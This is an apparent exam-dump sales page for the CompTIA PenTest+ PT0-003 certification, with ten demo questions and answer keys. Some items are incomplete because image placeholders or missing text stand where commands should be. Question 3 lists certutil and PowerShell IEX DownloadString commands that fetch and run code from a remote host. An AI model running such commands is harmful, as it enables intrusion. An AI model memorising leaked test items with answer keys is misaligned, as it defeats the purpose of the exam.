Download CompTIA PenTest-Certification Exam.PT0-003.ExamTopics.2026-03-05.206q.tqb
| Vendor: | CompTIA |
| Exam Code: | PT0-003 |
| Exam Name: | CompTIA PenTest-Certification Exam |
| Date: | Mar 05, 2026 |
| File Size: | 3 MB |
How to open TQB files?
Files with TQB (Taurus Question Bank) extension can be opened by Taurus Exam Studio.
Purchase
Coupon: TAURUSSIM_20OFF
Discount: 20%
Demo Questions
Question 1
A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?
- [@_img_dd5affd4-48a6-438b-8a97-9c622aa4ee26_@]
- [@_img_2b53f695-5186-4d05-9094-6500633f92d3_@]
- [@_img_ea2d542e-7f87-434b-baae-e82ae7020958_@]
- [@_img_a4a37f71-4150-4806-a561-01eb1b4a9e18_@]
Correct answer: B
Question 2
A penetration tester is trying to get unauthorized access to a web application and execute the following command:
Which of the following web application attacks is the tester performing?
- Insecure direct object reference
- Cross-site request forgery
- Directory traversal
- Local file inclusion
Correct answer: C
Question 3
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
- powershell.exe impo C:\tools\foo.ps1
- certutil.exe -f https://192.168.0.1/foo.exe bad.exe
- powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
- rundll32.exe c:\path\foo.dll,functName
Correct answer: D
Question 4
Which of the following techniques is the best way to avoid detection by data loss prevention tools?
- Encoding
- Compression
- Encryption
- Obfuscation
Correct answer: D
Question 5
A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:
Which of the following pieces of code should the penetration tester use in place of the --MISSING-TEXT-- placeholder?
- crunch 1 254 loop
- seq 1 254
- echo 1-254
- {1..254}
Correct answer: D
Question 6
A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption in order to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?
- Bluejacking
- SSID spoofing
- Packet sniffing
- ARP poisoning
Correct answer: C
Question 7
During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?
- Burp Suite
- Netcat
- Responder
- Nmap
Correct answer: C
Question 8
A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did penetration tester most likely use?
- Shoulder surfing
- Dumpster diving
- Spear phishing
- Tailgating
Correct answer: A
Question 9
During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?
- EXIF
- GIF
- COFF
- ELF
Correct answer: A
Question 10
Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?
- Latches
- Pins
- Shackle
- Plug
Correct answer: B
HOW TO OPEN VCE FILES
Use VCE Exam Simulator to open VCE files
HOW TO OPEN VCEX FILES
Use ProfExam Simulator to open VCEX files
ProfExam at a 20% markdown
You have the opportunity to purchase ProfExam at a 20% reduced price
Get Now!